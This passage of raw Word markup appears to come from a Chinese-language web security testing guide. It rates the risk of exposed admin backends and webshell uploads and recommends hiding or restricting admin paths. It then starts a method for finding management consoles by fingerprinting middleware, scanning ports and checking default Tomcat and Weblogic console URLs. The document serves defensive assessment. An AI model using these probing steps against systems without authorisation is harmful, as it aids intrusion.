      <w:r w:rsidR="003F2A49" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D6BF0" w14:textId="4E039B9D" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="00510CDB" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006B000C" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过登录网站管理后台篡改页面，或利用上传功能上传</w:t>
      </w:r>
      <w:r w:rsidR="006B000C" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="0053019C" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，导致</w:t>
      </w:r>
      <w:r w:rsidR="006B000C" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器被控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872AA1B" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90C54F" w14:textId="633B4A62" w:rsidR="00B56291" w:rsidRPr="00215B4A" w:rsidRDefault="00283579" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00B56291" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00B56291" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问默认管理后台，通过后台获取</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F7122" w14:textId="35521113" w:rsidR="00B56291" w:rsidRPr="00215B4A" w:rsidRDefault="00283579" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="000C1430" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00B56291" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问默认管理后台，并成功登录，但无法获取</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F4B86E" w14:textId="74A18510" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="00283579" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="000C1430" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00B56291" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00C25D80" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问默认管理后台，但无法登录或执行危险操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D62A949" w14:textId="00773EAE" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="007D087B" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，将管理后台</w:t>
      </w:r>
      <w:r w:rsidR="000679B7" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏在非常规目录下或增加管理后台的访问限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D4AC87" w14:textId="4B08AB7B" w:rsidR="00403119" w:rsidRPr="00215B4A" w:rsidRDefault="00403119" w:rsidP="00215B4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ACFF059" w14:textId="5E76AC00" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="002418BC" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc498434482"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>存在可访问的管理控制台入口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1721D58F" w14:textId="7009DE11"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台是一种基于</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用户界面，</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其常常被用于网站后台或者</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器控制台中，其不仅仅局限于容器或者网站管理后台，还包括一些数据库默认地址等。在</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全中，网站系统在泄漏其</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器（中间件）或者数据库的控制台后，存在增加被入侵的风险。常见的</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台包括以下多种：</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aria2</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>websphere</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oracle</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jboss</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、等。这些</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的容器控制台常见访问形式：</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://hostname:port/load/</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如：</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://x.x.x.x:8080</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>/manage/</w:t>
      </w:r>
      <w:r w:rsidR="007A05D6" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D5D2B" w14:textId="1A9E3FDA" w:rsidR="00E32B9D" w:rsidRPr="00215B4A" w:rsidRDefault="00757422" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00E32B9D" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的</w:t>
      </w:r>
      <w:r w:rsidR="00E32B9D" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00E32B9D" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台检测方法：整体思路为首先需识别网站容器的指纹，判断其所采用的中间件，然后去扫描其所开放的端口，根据开放端口信息和常见固定的路径，去判断其控制台地址。以下列举常见控制台的检测方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFBFDC3" w14:textId="01A02CCB"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Apache+tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台地址为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://x.x.x.x/manager/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者添加端口：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://x.x.x.x:8080/manager/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TOMCAT5</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（开始默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台不存在，</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat5</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前的控制台为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0042CBBB" w14:textId="02D991F5"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Weblogic</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://[weblogic</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在机器</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP]:[weblogic</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]/console</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若没有指定端口，且安装在本机上则为：（</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7001</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://localhost:7001/console</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E66A7" w14:textId="6FC11CA6"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Websphere</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
